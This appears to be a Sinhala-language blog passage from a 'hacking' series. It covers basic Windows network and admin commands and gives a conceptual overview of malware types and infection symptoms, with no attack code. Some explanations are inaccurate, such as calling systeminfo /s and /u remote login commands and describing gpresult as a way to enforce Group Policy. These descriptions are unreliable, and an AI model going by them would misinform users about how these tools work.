hostname,os type,version,product id,install date,boot time හා hardware ගැන වගේ තොරතුරැ මේ කමාන්ඩ් එකෙන් හොයාගන්න පුථවන්...මේ කමාන්ඩ් එකත් trouble shooting වලට ගොඩක් වැදගත්...ඒ වගේම systeminfo / s හෝ systeminfo /u කියන කමාන්ඩ් වලින් remote machine වලට ලොග් වෙන්නත් පුථවන්(systeminfo / s සිස්ටම් එකට ලොග් වෙන්නත් systeminfo /u යුසර් එකට ලොග් වෙන්නත් යොදාගන්න පුථවන්...)



# tasklist හා taskkill :-මේ කමාන්ඩ් එකෙන් ඕඑස් එකේ එම අවස්ථාවේ ක්‍රියාත්මකවෙන වැඩසටහන් දැනගන්න පුථවන්(වින්ඩෝස් ටාස්ක් මැනේජර් එකෙන් කරන දේ) ඒ වගේම taskkill /ඔබට අවශ්‍ය ඉමේජ් නේම් එක, දිලා ඒ වැඩසටහන නවත්වන්න පුථවන්....

උදා :- taskkill /im notepad.exe

#  type :- කමාන්ඩ් ප්රොම්ප්ට් එකෙන් අපට අවශ්‍ය ටෙක්ස්ට් ෆයිල් විවෘත කරගන්න මේ කමාන්ඩ් එක යොදාගන්න පුථවන්...
උදා :- type ෆයිල්නේම්එක.txt

# netstat :- පරිඝණකය හා සම්භන්ධ සියථම connections හා listening ports ගැන තොරතුරු...ඒ වගේම Ethernet statistics , host IP Addresses වගේ දේවල් ගැන දැනගන්න මේ  කමාන්ඩ් එක යොදාගන්න පුථවන්....

netstat -a (සියථම connections ගැන තොරතුරු දැන ගැනීමට)
netstat -n (සාරාංශයක් පමනක් ලබාගැනීමට)

# net command :-මේ කමාන්ඩ් එක ගොඩක් අවශ්‍යතා ඉටු කර ගන්න භාවිතා කරන්න පුථවන්...නෙට්වර්ක් සැකසුම් හදන්න,විස්තර දැනගන්න වගේම වෙනස් කරන්නත් මේ කමාන්ඩ්එක යොදාගන්න පුථවන්.....

                  * net stop server
                  * net start server
                  * net start
                                  කියන කමාන්ඩ් වලින් ඉහත කියපු (නෙට්වර්ක් සැකසුම් හදන්න,විස්තර දැනගන්න,වෙනස් කරන්න)වගේ දේවල් කරන්න පුථවන්...ඒ වගේම පහත කමාන්ඩ් වලින් shared network drives කනෙක්ට් කරන්න ඩිස්කනෙක්ට් කරන්න පුථවන්..

              * net use m: \\myserver\sharename
              * net use m: \\myserver\sharename /delete
# nslookup :- ip  address එකට අධාල වෙබ් ලිපිනය(url එක) හෝ වෙබ් ලිපිනයකට අධාල ip  address එක දැනගැනීමට මේ කමාන්ඩ් එක යොදාගන්න පුථවන්....




# ping හා tracert :- නෙට්වර්ක් එකක connectivity එක පරීක්ෂා කරන්න මේ කමාන්ඩ් 2 යොදාගන්න පුථවන්....

                ping :-පරිඝණක දෙකක් අතරඇති connectivity එක පරීක්ශා කරන්න යොදාගනී......

                tracert :- එක් පරිඝණකයක සිට තවත් පරිඝණකයකට දත්ත යැවීමේ මාර්ගය පෙන්නුම් කරයි....

# gpresult :- Group Policy (කණ්ඩායම් ප්‍රතිපත්ති) ක්‍රියාත්මක කිරීමට යොදාගන්නා විදානයකි...

# netsh :-මේකත් ගොඩක් වැදගත් කමාන්ඩ් එකක්....


•     interfaces සැකසුම් කිරීමට
•     routing protocols සැකසුම් කිරීමට
•     filters සැකසුම් කිරීමට
•     routes සැකසුම් කිරීමට
                                               වැනි කාර්‍යන්ට යොදාගන්න පුථවන්........

තවත් පෝස්ට් එකක් අරගෙන එන්නම් ...........................................

Read more ...

හැකින් 6.......වයිරස්

 malware කියන්නේ පරිඝණකයකට ඇතුල්වී ඒ පරිඝණකයේ ඇති අකාර්යක්ශමතා හදුනාගෙන ඒ තුලින් පරිඝණකයට හානි කිරීම හෝ එහි ඇති දත්ත පිටතට ලබාදීමට නිර්මාණය කරනලද ප්‍රෝගෑම් විශේෂයක්.......මේ විදියේ අහිතකර  ප්‍රෝගෑම් වර්ග අපිට සාමාන්යයෙන් නිතරම දකින්න ලැබෙනවා..ප්‍රබේද කීපයකට අයත් ප්‍රෝගෑම් මේ විදියට හදුන්වන්න පුථවන්........
01. ස්වාදීනව ව්‍යාප්තවන :- මෙවැනි වැඩසටහන් කෙසේ  හෝ පරිඝණකයකට ඇතුල් වී ස්වාදීනව තම අනුරෑ නිර්මාණය කර  ඒවා  ව්‍යාප්ත කරයි......
02. ස්වාදීනව ස්ඨාපනය වන :- කෙසේ හෝ පරිඝණකයට ඇතුල්වී ස්වාදීනව ස්ඨාපනය වී පරිඝණකයේ සංවේදී තොරතුරු පිටතට ලබා දේ....
03. පරපෝශිත :- පරිඝණකයේ ඇති වෙනත් වැඩසටහනක් උපයෝගී කරගනිමින් තම අවශ්‍යතාව සපුරාගන්නා වැඩසටහන් ය......


Trojan  horse


මේ විදියෙ  වැඩසටහන් නිතරම දකින්න පුථවන්...ඒ වගේම  මේ වැඩසටහන් හැකර්ලා අතර ගොඩක් ප්‍රසිද්ධයි.......පරිඝණකයට අවශ්‍ය වැඩසටහනක් විදියට හරි ඒ වගේ වැඩසටහනක් එක්ක හරි සැක හිතෙන්නේ නැති විදියට පරිඝණකයට ඇතුල් වෙලා තමන්ගේ නියම අරමුණ ක්‍රියාත්මක කරන්න ප්‍රෝගෑම් කරපු මේවගේ වැඩසටහන් ගොඩක් වෙලාව පාස්වරඩ් හොරකම් කරන්න වගේ  දේවල් වලට යොදාගන්නවා.....


Logic bomb


මේක ටිකක් පරන විදියෙ malicious software එකක්....මේකත් පරපෝශිත වැඩසටහනක් විදියට හදුන්වන්න පුථවන්....වෙනත් වැඩසටහනක් සමග පරිඝණකයට හොරෙන් ඇතුල්වෙලා අවශ්‍ය වෙලාවට පරිඝණකය  විනාශ කරන්න පුථවන් විදියට තමයි මේකක නිර්මාණය  කරලා තියෙන්නේ......


back door/trap door

මේකත් පරපෝශිත වැඩසටහනක්...back door කියන්නෙ පරිඝණකයේ security program මගහැරලා යන්න පුථවන් විදියට හදපු  වැඩසටහනක්...මේක හොද වැඩ වලටත්  යොදාගන්න පුථවන් ...ඒ වගේම RAT වගේ විශේෂ back door වැඩසටහන් වලින් පරිඝණකයට වෙනත් පරිඝණකයකින් ඇතුල්වෙන්න (remote desktop) වගේ  දේවල් කරන්නත් පුථවන්.....

virus

මේක මම උඩ ලියලා තියෙන හැම විදියටම ක්‍රියා කරනවා...ඒ කියන්නේ ස්වාදීනව ස්ඨාපනය වෙන, ස්වාදීනව ව්‍යාප්තවෙන,ඒ වගේම  පරපෝශිත විදියටත් ක්‍රියාත්මක වෙන්න පුථවන් වැඩසටහනක්....

virus වර්ග

parasitic virus :- මේක නිතරම භාවිතාවෙන virus එකක්....exe file එකකට අමුණලා එවීමෙන් මේක ව්‍යාප්ත කරනවා..........

memory resident virus :- system memory 1 program එකක් විදියට ස්ථාපනය වෙලා  ව්‍යාප්තවෙන වැඩසටහන් මේ විදියට හදුන්වන්න පුථවන්

boot sector virus :- මේ virus එකෙන් computer එකේ තියෙන  boot file පථදු කරනවා.....ඒ කියන්නේ computer එක on වෙන්න වුවමනා දත්තත විනාශ කරනවා....

stealth virus :- වයිරස් ගාඩ් (anti virus) ස්කෑන් වලට සොයාගන්න බැරි විදියට හැංගෙන්න  පුථවන් වැඩසටහන්..

worm

වයිරස් වලට සමාන ක්‍රියාවලියක් සිදු කරන ඒත් පරපෝශිත නොවෙන වැඩසටහන් මේ විදියට හදුන්වන්න පුථවන්.....

rabbit

bacteria කියලා හදුන්වන්නත් පුථවන්....ඉතා ඉක්මනින් තම ප්‍රමාණය දෙගුණ තෙගුණ කරගන්න පුථවන් වැඩසටහන් වර්ගයකි.....

spyware



පරිඝණකයේ තියෙන වැදගත් තොරතුරු එකතු කරලා තමන්ට අවශ්‍ය තැනට යවන්න පුථවන් විදියට හදපු වැඩසටහන් මේ විදියට හදුන්වන්න පුථවන්....






adware

spyware වගේම වැඩසටහනක්..ඒත් ස්වාදීනව ස්ථාපනය වෙන්නේ නැහැ......

computer එකට මේ වගේ වැඩසටහනක් ඇතුල්වෙලාද කියලා බලාගන්නේ කොහොමද ????????

01.computer එකේ වේගය අඩු  වෙනවා........
02.සමහරවිට විදානයකින් තොරව  ඕෆ් වෙන්න හරි රී ස්ටාට් වෙන්න පුථවන්......
03.විදානයකින් තොරව ඊමේල්  සෙන්ඩ් වෙන්න පුථවන්......

මම හිතන්නේ වයිරස් ගැනත් වුවමනා දෙයක් දැනගන්න ඇති .....තවත් පෝස්ට් එකක් අරගෙන එන්නම්

Read more ...